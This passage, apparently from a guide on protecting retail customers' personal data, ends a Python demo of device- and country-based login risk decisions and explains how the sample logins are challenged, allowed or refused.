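T0 = 1_700_000_000
SAMPLE_EVENTS = [
    LoginEvent("cust-42", T0, "US", "dev-a"),                 # first sight of this device
    LoginEvent("cust-42", T0 + 86_400, "US", "dev-a"),        # same device, next day
    LoginEvent("cust-42", T0 + 86_400 + 600, "DE", "dev-b"),  # new device, new country, 10 min later
    LoginEvent("cust-42", T0 + 3 * 86_400, "CA", "dev-a"),    # known device, new country, days later
]


def run_demo(events=SAMPLE_EVENTS):
    """Run the sample history through a fresh profile and return the decisions."""
    profile = CustomerProfile()
    return [decide(profile, ev) for ev in events]


if __name__ == "__main__":
    for ev, action in zip(SAMPLE_EVENTS, run_demo()):
        print(f"{ev.ts} {ev.country} {ev.device_id}: {action}")
```

On the sample history the first login on an unseen device is challenged, the repeat from the same device the next day is allowed, the attempt from a second device in another country ten minutes later is refused, and a later login from the known device in a new country is challenged again. The point of keeping the scoring separate from the decision is that the reasons can be logged and shown to the customer, which is the "control over their personal data" the section describes.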

The retail industry manages a great deal of PII for customers and employees, and protecting it requires a multi-faceted approach. Your customers are trusting you with their personal lives. Make sure you act like it.
